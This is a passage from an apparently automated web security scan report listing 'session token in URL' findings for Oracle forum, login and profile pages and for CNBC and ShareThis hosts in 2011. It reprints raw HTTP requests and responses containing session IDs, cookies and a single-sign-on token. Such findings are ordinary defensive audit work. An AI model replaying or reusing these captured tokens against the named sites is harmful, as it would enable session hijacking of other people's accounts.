...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0oracle?categoryID=18"
title = "Used 4074 times" >oracle</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0performance?categoryID=18"
title = "Used 1241 times" >performance</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0pl_sql?categoryID=18"
title = "Used 1607 times" >pl_sql</a >
...[SNIP]...
<li class="jive-tagset-popularity1" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0plsql?categoryID=18"
title = "Used 2380 times" >plsql</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0report?categoryID=18"
title = "Used 954 times" >report</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0rman?categoryID=18"
title = "Used 904 times" >rman</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0sql?categoryID=18"
title = "Used 4069 times" >sql</a >
...[SNIP]...
<span><a href="/forums/tags;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18">View all</a>
...[SNIP]...
<a href="http://www.oracle.com/us/corporate/index.html"><img alt="Hardware and Software Engineered to Work Together" src="/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" border="0" height="34" width="182"></a>
...[SNIP]...
<a href="http://www.oracle.com/us/syndication/feeds/index.html"><img style="margin-bottom: 1px;" alt="Oracle RSS Feeds" src="/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" align="absmiddle" border="0" height="14" width="14"></a>
...[SNIP]...

<script language="JavaScript" src="/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"></script>
<script language="JavaScript" src="/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"></script>
...[SNIP]...

8.3. https://forums.oracle.com/forums/main.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/main.jspa

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84

Request

Response

8.4. https://forums.oracle.com/forums/style/style.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/style/style.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/style/style.jsp;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/style/style.jsp;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-IN
Last-Modified: Thu, 28 Aug 2008 03:01:38 GMT
ETag: "STYLE_JSP_ETAG"
Content-Type: text/css; charset=UTF-8
Content-Length: 48579
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ---------------------------------
...[SNIP]...

8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/feed-icon-14x14.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:08 GMT
ETag: "5.5.30-ad155f4dae3c8bbb7b41e77153238054-503"
Content-Type: text/plain
Content-Length: 503
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

......JFIF.....G.G.....C........... ... .......

.

........................... ...C.............. ..........................................
...[SNIP]...

8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/info_company.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-31aaea14c05fcefb6736e09849bcc8e4-1711"
Content-Type: text/plain
Content-Length: 1711
Date: Tue, 06 Sep 2011 16:13:19 GMT
Connection: keep-alive

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/oralogo_small.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-82f0a9b75571a56326f5d9340ef962ef-2059"
Content-Type: text/plain
Content-Length: 2059
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/otn_new.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:10 GMT
ETag: "5.5.30-50ebcb915812177e8f99db0d9eb394bd-18986"
Content-Type: text/plain
Content-Length: 18986
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* MASTER FONT FACES */
BODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;}

/* used to remove double space issue in pre tags*/
.jive-message-body pre br, textEditor pre br { display:none;
...[SNIP]...

8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b

Request

GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code_forums.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b

Request

GET /forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-82e1f8bbd97835a17866085b364ebf72-5398"
Content-Type: text/plain
Content-Length: 5398
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive

/* Setting the s_account */
function s_setAccount(){
var s_account="";
var curUrl = location.href;

       if(curUrl.indexOf("-stage") != -1 ) {
               s_account = "oracledevall,oracledevforum1";
       }
...[SNIP]...

8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/spacer.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:11 GMT
ETag: "5.5.30-c895ce2a9c0546d80965bd3eeafcf070-43"
Content-Type: text/plain
Content-Length: 43
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.............!.......,...........D..;

8.12. https://forums.oracle.com/forums/themes/english/resources/style.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/style.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://forums.oracle.com/forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0

Request

GET /forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-454e44ddb000046027da50612f1e4157-45429"
Content-Type: text/plain
Content-Length: 45429
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ----------------------------------
...[SNIP]...

8.13. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&source=share5x&publisher=4321fb91-a13e-47c8-8a96-426495c5931a&hostname=www.tenzing.com&location=%2Fatg-ecommerce-hosting.asp&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&sessionID=1315341130568.42115&fpc=d5ad7d-1324070db49-4656e66c-1&ts1315341131009.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio

Request

GET /pview?event=pview&source=share5x&publisher=4321fb91-a13e-47c8-8a96-426495c5931a&hostname=www.tenzing.com&location=%2Fatg-ecommerce-hosting.asp&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&sessionID=1315341130568.42115&fpc=d5ad7d-1324070db49-4656e66c-1&ts1315341131009.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 06 Sep 2011 15:32:11 GMT
Connection: keep-alive

8.14. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The URL in the request appears to contain a session token within the query string:

https://login.cnbc.com/cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:33 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...

8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://login.oracle.com
Path:	/pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The URL in the request appears to contain a session token within the query string:

https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357

Request

Response

8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/adf/images/sibusy.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/adf/images/sibusy.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186961165318884,1)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 781

GIF89a..................................................................................................................................................................................................
...[SNIP]...

8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/adf/images/siready.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/adf/images/siready.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/adf/images/siready.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
